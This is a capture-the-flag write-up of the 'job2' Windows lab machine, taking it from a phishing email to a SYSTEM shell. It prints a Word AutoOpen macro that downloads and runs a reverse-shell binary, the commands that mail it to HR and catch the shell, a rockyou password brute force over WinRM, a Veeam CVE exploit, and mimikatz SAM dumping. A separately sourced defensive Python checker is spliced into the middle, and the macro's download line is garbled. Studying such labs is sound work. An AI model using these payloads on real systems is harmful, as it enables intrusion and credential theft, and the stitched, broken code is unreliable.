job2: a hard Windows machine, from phishing to admin


1. Enable Developer Tools in the Ribbon menu to gain access to macros.
2. Name your macro AutoOpen() if you are working with Word 2016+.
3. Select the current document as the place to store the macro.
4. Don't use .docx as the file extension, since it won't allow for embedded macros. Use either .doc or .docm.

Do the testing on your LAN first (a Kali box and a Windows 11 PC).

I used this macro:

Sub AutoOpen()

  a = Shell("""curl"" """" ""-o"" ""C:\Windows\tasks\rcat_192.168.1.41_443.exe""", vbHide)
  b = Shell("C:\Windows\tasks\rcat_192.168.1.41_443.exe", vbHide)

End Sub

Open puck3.docm twice: the first time the macro downloads rcat, the second time it executes rcat.exe.

If you receive a reverse shell on the LAN, start the job2 box and go for job2.
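As an added defender-side example (not part of the original post), here is a Python check that classifies an incoming attachment by its container rather than its file name, flagging the vbaProject.bin part and the macroEnabled content type that a puck3.docm-style document carries, and the legacy OLE (.doc) container that can carry VBA too. The sample documents it builds are constructed stand-ins, not real files.

```python
import io
import zipfile

MACRO_ENABLED_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_CT = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
VBA_PART = "word/vbaProject.bin"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc (compound file) signature


def inspect_attachment(name: str, data: bytes) -> dict:
    """Classify an Office attachment by what it actually contains, not by its extension."""
    result = {"name": name, "container": "unknown", "has_vba": False, "reasons": []}
    if data.startswith(OLE_MAGIC):
        # A legacy .doc can hold a VBA project; a deeper look needs an OLE parser (e.g. oletools' olevba).
        result["container"] = "ole"
        result["reasons"].append("legacy OLE (.doc) container: may carry VBA, inspect further")
        return result
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        result["reasons"].append("not an OOXML zip")
        return result
    result["container"] = "ooxml"
    names = set(zf.namelist())
    if VBA_PART in names:
        result["has_vba"] = True
        result["reasons"].append(f"{VBA_PART} present")
    ct = zf.read("[Content_Types].xml").decode("utf-8", "replace") if "[Content_Types].xml" in names else ""
    if MACRO_ENABLED_CT in ct:
        result["has_vba"] = True
        result["reasons"].append("content type is macroEnabled")
    if result["has_vba"] and name.lower().endswith(".docx"):
        # Word refuses macros in .docx, so VBA under that name is a renamed file: extension mismatch
        result["reasons"].append("VBA inside a .docx name: extension mismatch")
    return result


def build_sample(macro: bool) -> bytes:
    """Constructed minimal OOXML document, with or without a VBA part (sample input only)."""
    main_ct = MACRO_ENABLED_CT if macro else PLAIN_CT
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    f'<Types><Override PartName="/word/document.xml" ContentType="{main_ct}"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
        if macro:
            zf.writestr(VBA_PART, b"\x00" * 16)  # placeholder bytes standing in for the VBA project
    return buf.getvalue()
```

Run it over the mail gateway's attachment directory and quarantine anything where has_vba is true or the container is "ole", regardless of what the sender named the file.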

Here we go …

We start with an nmap scan:

Starting Nmap 7.93 ( ) at 2024-07-11 10:58 CEST
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 10:59 (0:00:00 remaining)
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 85.00% done; ETC: 11:00 (0:00:00 remaining)
Nmap scan report for job2.vl (
Host is up (0.019s latency).
Not shown: 989 filtered tcp ports (no-response)
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 a39477ca160eecfb238667c60ae3ca7b (RSA)
|   256 0e2a317094995d95d4f840d5b5368e88 (ECDSA)
|_  256 29312ac355b2f773f2d3bdbcc5c114f0 (ED25519)
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp  open  rpcbind
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
|_http-title: Not Found
445/tcp  open  microsoft-ds?
1063/tcp open  rpcbind
2049/tcp open  rpcbind
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-11T08:59:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2024-07-10T08:57:44
|_Not valid after:  2025-01-09T08:57:44
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T08:59:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 69.18 seconds

We examine the website and find out how to apply for the job.

Send your CV twice (of course, first change the test LAN IP in the macro of puck3.docm to your tun0 IP on the vulnhub VPN):

└─$ sendemail -s job2.vl -f "puck <>" -t hr@job2.vl -o tls=no -m "hey pls check my cv" -a puck3.docm 

Jun 30 15:53:21 kali sendemail[35338]: Email was sent successfully!

Catch the shell:

└─$ python3 -m http.server 80
Serving HTTP on port 80 ( ... - - [11/Jul/2024 11:06:23] "GET /rcat.exe HTTP/1.1" 200 -


└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 50302
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv


Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


C:\Windows\system32>net users

User accounts for \\JOB2

Administrator            DefaultAccount           Ferdinand                
Guest                    Julian                   svc_veeam                
The command completed successfully.


Next I brute-forced Ferdinand's password over WinRM:

└─$ crackmapexec winrm -u Ferdinand -p /usr/share/wordlists/rockyou.txt

SMB   5985   JOB2             [*] Windows Server 2022 Build 20348 (name:JOB2) (domain:JOB2)
HTTP   5985   JOB2             [*]
WINRM   5985   JOB2             [-] JOB2\Ferdinand:123456
WINRM   5985   JOB2             [-] JOB2\Ferdinand:12345
WINRM   5985   JOB2             [-] JOB2\Ferdinand:123456789
WINRM   5985   JOB2             [-] JOB2\Ferdinand:password
WINRM   5985   JOB2             [-] JOB2\Ferdinand:iloveyou

and it found Ferdinand's password.

Next, evil-winrm to the box and find Veeam Backup installed (port 9401 is listening),

and use CVE-2023-27532-RCE-Only to finish JOB2:

└─$ evil-winrm -u Ferdinand -p Fr<REDACTED>! -i
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub:
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> netstat -ano | findstr /s 9401
  TCP               LISTENING       2132
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> 


*Evil-WinRM* PS C:\temp> upload Veeam.Backup.Interaction.MountService.dll
Info: Uploading /home/puck/vulnlab/job2/Veeam.Backup.Interaction.MountService.dll to C:\temp\Veeam.Backup.Interaction.MountService.dll
Data: 573544 bytes of 573544 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload veeam.backup.model.dll
Info: Uploading /home/puck/vulnlab/job2/veeam.backup.model.dll to C:\temp\veeam.backup.model.dll
Data: 5925652 bytes of 5925652 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --target --cmd c:\temp\rcat_10.8.2.138_443.exe

and catch the admin shell:

└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 56039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements!

PS C:\Windows\system32> whoami
nt authority\system

PS C:\users\Administrator\Desktop> dir

    Directory: C:\users\Administrator\Desktop

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          5/3/2023   2:04 PM           1029 LINQPad 5.lnk                                                        
-a----          5/3/2023   4:00 PM             36 root.txt                                                             

PS C:\users\Administrator\Desktop> type root.txt
type root.txt
PS C:\users\Administrator\Desktop>


That’s all.

Beyond root

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

mimikatz # token::elevate
Token Id  : 0
User name :

764     {0;000003e7} 1 D 29290          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;01a2aee9} 3 F 35131903    JOB2\puck       S-1-5-21-3935782767-3829597994-1046841959-1004  (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 37906026    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
Local SID : S-1-5-21-3935782767-3829597994-1046841959

SAMKey : 36c26e0a457c1d613a608d104acca9e9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 6f2<REDACTED>04a


The startup script that drives the phishing simulation, C:\Users\Julian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phishs.bat, contains:

powershell \windows\phishsim.ps1

and \windows\phishsim.ps1, which opens every file dropped into C:\programdata\attachments in Word, looks like this:


Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"

$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = 'C:\programdata\attachments'
$watcher.EnableRaisingEvents = $true
# scriptblock braces restored here; they were lost when the script was pasted
$action = {
    $name = $event.SourceEventArgs.FullPath
    $changetype = $event.SourceEventArgs.ChangeType
    Write-Host "$name was $changetype at $(get-date)"
    if (Test-Path $name) {
        Write-Host "Opening $name"
        # every new attachment is opened in Word, so an AutoOpen macro runs as Julian
        Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" -ArgumentList "$name"
        sleep 45
        Write-Host "Resetting.."
        # Get-Process matches on the bare image name; "WINWORD.EXE" never matches
        Get-Process "WINWORD" -ErrorAction SilentlyContinue | Stop-Process -Force
        sleep 5
        Remove-Item $name -Force
    }
}
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Changed' -Action $action

# keep the script alive so the event subscriptions keep firing (loop reconstructed around the trailing sleep)
while ($true) {
    sleep 45
}



